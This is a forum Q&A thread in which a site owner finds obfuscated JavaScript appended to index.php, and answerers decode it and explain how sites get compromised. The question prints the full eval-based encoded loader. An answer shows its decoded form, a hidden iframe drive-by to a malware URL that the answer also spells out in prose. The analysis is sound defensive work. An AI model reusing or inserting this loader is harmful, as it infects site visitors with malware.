# Unknown Script in my index.php, produce malware, Have i been hacked?

Tags: php, javascript, malware

I have a site. My site Was difficult yesterday, when open it with Google Chrome, instead of my site this page is shown:

```
Warning: Visiting this site may harm your computer!
The website at http:... appears to host malware - Software that can hurt your 
computer or otherwise operate without your consent.
....
```

I viewed my page source in Chrome and I saw this script end of my code (after ):

```
 echo ""; echo "<script>try{if(window.document)window[\"document\"][\"body\"]=\"123\"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v[\"document\"][\"bo\"+\"dy\"]=\"123\"}catch(gfdnfdgber){m=123;if((alert+\"\").indexOf(\"n\"+\"a\"+\"ti\"+\"ve\")!==-1)ev=window[\"eval\"];}}
n=[\"9\",\"9\",\"45\",\"42\",\"17\",\"1f\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"4f\",\"2g\",\"4l\",\"39\",\"3m\",\"43\",\"33\",\"3m\",\"49\",\"41\",\"1f\",\"1e\",\"3n\",\"4b\",\"40\",\"4l\",\"1e\",\"1g\",\"3g\",\"1n\",\"3i\",\"1g\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"4e\",\"1f\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\",\"17\",\"41\",\"48\",\"4f\",\"41\",\"17\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"4j\",\"4e\",\"45\",\"4g\",\"41\",\"1f\",\"19\",\"2a\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"17\",\"4f\",\"4e\",\"3o\",\"2b\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4e\",\"3m\",\"43\",\"4b\",\"4b\",\"4f\",\"41\",\"1l\",\"45\",\"4c\",\"4d\",\"1l\",\"3o\",\"4b\",\"1m\",\"3o\",\"4b\",\"4e\",\"4e\",\"41\",\"3o\",\"4g\",\"45\",\"4a\",\"43\",\"1m\",\"45\",\"49\",\"3m\",\"43\",\"45\",\"4a\",\"41\",\"1k\",\"4e\",\"41\",\"3m\",\"40\",\"4l\",\"3k\",\"41\",\"4a\",\"4g\",\"41\",\"4e\",\"3k\",\"47\",\"41\",\"41\",\"4a\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"17\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"2b\",\"1e\",\"1o\",\"1n\",\"1e\",\"17\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"2b\",\"1e\",\"1o\",\"1n\",\"1e\",\"17\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"2b\",\"1e\",\"4i\",\"45\",\"4f\",\"45\",\"3n\",\"45\",\"48\",\"45\",\"4g\",\"4l\",\"28\",\"44\",\"45\",\"40\",\"40\",\"41\",\"4a\",\"29\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"28\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"29\",\"48\",\"41\",\"42\",\"4g\",\"28\",\"1n\",\"29\",\"4g\",\"4b\",\"4c\",\"28\",\"1n\",\"29\",\"1e\",\"2c\",\"2a\",\"1m\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"2c\",\"19\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\",\"d\",\"9\",\"9\",\"42\",\"4h\",\"4a\",\"3o\",\"4g\",\"45\",\"4b\",\"4a\",\"17\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"4e\",\"1f\",\"1g\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"4i\",\"3m\",\"4e\",\"17\",\"42\",\"17\",\"2b\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"3o\",\"4e\",\"41\",\"3m\",\"4g\",\"41\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"1f\",\"1e\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"4f\",\"4e\",\"3o\",\"1e\",\"1j\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4e\",\"3m\",\"43\",\"4b\",\"4b\",\"4f\",\"41\",\"1l\",\"45\",\"4c\",\"4d\",\"1l\",\"3o\",\"4b\",\"1m\",\"3o\",\"4b\",\"4e\",\"4e\",\"41\",\"3o\",\"4g\",\"45\",\"4a\",\"43\",\"1m\",\"45\",\"49\",\"3m\",\"43\",\"45\",\"4a\",\"41\",\"1k\",\"4e\",\"41\",\"3m\",\"40\",\"4l\",\"3k\",\"41\",\"4a\",\"4g\",\"41\",\"4e\",\"3k\",\"47\",\"41\",\"41\",\"4a\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4i\",\"45\",\"4f\",\"45\",\"3n\",\"45\",\"48\",\"45\",\"4g\",\"4l\",\"2b\",\"1e\",\"44\",\"45\",\"40\",\"40\",\"41\",\"4a\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"2b\",\"1e\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"48\",\"41\",\"42\",\"4g\",\"2b\",\"1e\",\"1n\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4g\",\"4b\",\"4c\",\"2b\",\"1e\",\"1n\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"1e\",\"1j\",\"1e\",\"1o\",\"1n\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"1e\",\"1j\",\"1e\",\"1o\",\"1n\",\"1e\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"9\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"4f\",\"2g\",\"4l\",\"39\",\"3m\",\"43\",\"33\",\"3m\",\"49\",\"41\",\"1f\",\"1e\",\"3n\",\"4b\",\"40\",\"4l\",\"1e\",\"1g\",\"3g\",\"1n\",\"3i\",\"1l\",\"3m\",\"4c\",\"4c\",\"41\",\"4a\",\"40\",\"2h\",\"44\",\"45\",\"48\",\"40\",\"1f\",\"42\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\"];h=2;s=\"\";if(m)for(i=0;i-631!=0;i++){k=i;if(window[\"document\"])s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(v)ev(z)}}}</script>";
```

**NOTE** This script wasn't in my code *Before*!!
What is this?! How was written in my `index.php` file?!

Comment: Do you really need to ask if you have been hacked, when you have found code appended to your `index.php` without your knowledge?

Comment: @lanzz I understand it more like he is asking what happened and what to do next. Be generous and understand the stress he is most likely facing

Answer (score 2, accepted):

Yes of course:

If your pages was modified without your knowledge and accordance, there was certainly a *exploit* against your site.

Out of consideration of **HOW**, there is a little try to discover **WHAT**:

To ensure and to know more about this *coded virus*, we could run `php` from command line:

**1.** Copy bad code to script, enclosing them between *php* tags:

```
cat << eof > badscript
<?php
echo ""; echo "<script>try{if(window.doc....
n=[\"9\",\"9\",\"45\",\"42\",\"1
?>
```

**2.** Do the first translation with `php`:

```
php <badscript >badscript2
```

now `badscript2` contain a *javascript encoded virus*

```
<script>try{if(window.document)window["document"]["body"]="1...
n=["9","9","45","42","17"...;if(v)ev(z)}}}</script>
```

After reading this small script (keeping out `html` tags):

```
sed < badscript2 -e 's/<\/\?script>//g' >badscript3
```

**3.** little read of javascript code (I'm using emacs)

```
rename s/$/.js/ badscript3 
emacs badscript3.js
```

... some format operations... save...

```
sed <badscript3.js -e 's/\t/        /g;s/^/    /;s/^\(.\{76\}\).*$/\1.../' 
try{
    if (window.document) window["document"]["body"]="123"}
catch (bawetawe) { 
    if(window.document){
        v=window;
        try{fawbe--}catch(afnwenew){
            try{(v+v)()}catch(gngrthn){
                try{
                    if(020===0x10) v["document"]["bo"+"dy"]="123"
                }catch(gfdnfdgber){
                    m=123;
                    if((alert+"").indexOf("n"+"a"+"ti"+"ve")!==-1) 
                        ev=window["eval"];
                }
            }
            n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41"...
            h=2;
            s="";
            if(m)for(i=0;i-631!=0;i++){
                k=i;
                if(window["document"])
                    s+=String.fromCharCode(parseInt(n[i],25));
            }
            z=s;
            if(v)ev(z)
        }
    }
}
```

So can see that the *interesting* part is from `n=[...` and `ev(z)`.
For this, I use *Mozilla's Spidermonkey* binary tool: `smjs`:

After keeping out first (readable) part and some test that won't work under commandline's `smjs`, like `window` or `document`, **and** changing the **last** operation `ev` (defined in first part as `ev=window.eval` in a more *smjs* apropriate function (I choose: `print()` ;-),
there is what a send to `smjs`:

```
n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","...
h=2;
s="";
for(i=0;i-631!=0;i++){
    k=i;
    s+=String.fromCharCode(parseInt(n[i],25));
}
z=s;
print(z);
```

**4.** Finaly show me this:

```
smjs < badscript3.js >badscript4.js
emacs badscript4.js
```

That is:

```
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe
      src='http:  --  censored virus link -- .php' width='10' height='10'
      style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http: --  censored virus link -- keen.php');
f.style.visibility='hidden';f.style.position='absolute';
f.style.left='0';f.style.top='0';
f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
```

Nota: to minimise `cut'n past` risk i'v censored the link, they was initialy pointing to a **virus**:`http:` *slash slash* `ragoose.ipq.co` *slash* `correcting` *slash* `imagine-ready_enter_keen.php`

Be care, but have fun!

Comment: I edited in an editor, changed all \ to nothing, changed ev to document.write and got the same result...

Comment: @mplungjan: I use command line on non routed host, work with static files loaded with something like `ssh myProxy wget -O - >badfile`, but some says that I'm paranoid...

Comment: Yeah, I edit on a mac and know js vey well  so not worried either

Answer (score 3):

Your website was compromised. The way how it happened is usually one of following scenarios:

1) you have given access to the document root by FTP to someone using windows and his/her computer got a virus which recovered the FTP password from FTP client configuration (remember password feature)

2) someone guessed the password for FTP

3) the whole system can be compromised

4) some script/application is vulnerable (as @Konerak mentioned)

To find out, if it's the reasom of 1), 2) or the third, have a look to the FTP server logs - for `proftpd` it's `/var/log/proftpd/xferlog` on my `Debian` system

If it's one of the FTP problems, change FTP password immediately, run antivirus on all clients and distribute the new password. To cleanup the website, it's usually enough to search for the problematic string and remove it from all files in document root. It's usually the same string in the all infected files. Notice also javascript files are infected (`*.js`)

If there is a vulnerable script on the website, you can identify it by finding out the modify time of the index.php and find in the access logs the corresponding hits. They have usually POST method or tricky GET arguments (visible in the log)

Comment: 4/ On of your other scripts has a vulnarability and it can write to the index.php file.

Answer (score 1):

I've had this happen to me while on shared hosting numerous times. Usually its a vulnerable script by either you or someone else on your machine, that can then look for predictable file paths and append to the file.

```
/home/user1/public_html/index.php for example is very predictable.
```

So the vulnerability would allow for someone to run `"ls /home/"` and then look for `./public_html/index.php` in each directory. Many times  you can open these files even though you can't cd into that directory.

The other scenario is your site or one of your other domains has the vulnerability, which would allow write access (as the web server is usually owned by you) to any of your sub-directories.